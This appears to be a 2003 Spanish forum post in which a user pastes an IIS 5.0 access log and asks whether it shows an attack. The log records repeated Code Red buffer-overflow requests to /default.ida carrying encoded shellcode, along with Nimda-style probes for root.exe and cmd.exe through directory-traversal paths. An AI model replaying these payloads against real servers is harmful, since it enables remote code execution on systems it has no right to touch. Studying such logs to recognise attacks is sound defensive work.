Hola Compañeros:
Tengo una duda que significado tiene este log de Internet
Information Server.
Es un reporte de ataque ????.
Jorge
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2003-06-23 00:06:21
#Fields: date time c-ip cs-username s-ip s-port cs-method
cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2003-06-23 00:06:21 200.104.81.69 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 00:07:01 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 00:08:07 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 01:18:41 200.162.231.11 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 01:29:36 200.24.83.103 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 01:37:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 01:38:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 02:59:16 63.171.232.249 - 200.24.68.45 80
GET /exchange - 401 Mozilla/4.0+
(compatible;+MSIE+6.0;+Windows+NT+5.1)
2003-06-23 03:14:03 200.76.215.24 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 03:26:03 192.168.0.100 - 192.168.0.100 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 03:27:09 192.168.0.100 - 192.168.0.100 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 04:11:56 66.30.129.134 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 05:06:19 200.21.248.146 - 200.24.68.45 80
GET /exchweb/img/tool-refresh.gif - 304 Mozilla/3.01+
(compatible;)
2003-06-23 05:08:04 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 05:09:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 06:22:19 200.24.183.216 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 06:30:19 200.24.183.216 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 07:03:04 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 07:04:10 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 07:10:44 61.187.54.205 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 08:44:06 192.168.0.100 - 192.168.0.100 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 08:45:11 192.168.0.100 - 192.168.0.100 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 08:46:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 08:47:08 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 09:15:18 81.80.106.35 - 200.24.68.45 80
GET /exchange - 401 Mozilla/4.0+
(compatible;+MSIE+5.5;+Windows+NT+5.0;+Hotbar+4.3.1.0)
2003-06-23 09:23:50 69.2.204.102 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 10:29:06 192.168.0.100 - 192.168.0.100 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 10:30:12 192.168.0.100 - 192.168.0.100 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 10:39:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 10:40:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 11:27:39 218.18.83.172 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 11:34:56 200.12.25.80 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 12:09:07 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:10:13 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:15:03 200.24.68.45 - 200.24.68.45 80
OPTIONS / - 200 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:16:09 200.24.68.45 - 200.24.68.45 80
PROPFIND /SysVol - 404 Microsoft-WebDAV-MiniRedir/5.1.2600
2003-06-23 12:31:36 200.149.217.195 - 200.24.68.45 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%
u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%
ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%
u53ff%u0078%u0000%u00=a 200 -
2003-06-23 12:51:07 200.45.99.34 - 200.24.68.45 80
GET /scripts/root.exe /c+dir 404 -
2003-06-23 12:51:10 200.45.99.34 - 200.24.68.45 80
GET /MSADC/root.exe /c+dir 403 -
2003-06-23 12:51:15 200.45.99.34 - 200.24.68.45 80
GET /c/winnt/system32/cmd.exe /c+dir 404 -
2003-06-23 12:51:17 200.45.99.34 - 200.24.68.45 80
GET /d/winnt/system32/cmd.exe /c+dir 404 -
2003-06-23 12:51:25 200.45.99.34 - 200.24.68.45 80
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 -
2003-06-23 12:51:28 200.45.99.34 - 200.24.68.45 80
GET /_vti_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe /c+dir 500 -
2003-06-23 12:51:35 200.45.99.34 - 200.24.68.45 80
GET /_mem_bin/..%5c../..%5c../..%
5c../winnt/system32/cmd.exe /c+dir 404 -
Leer las respuestas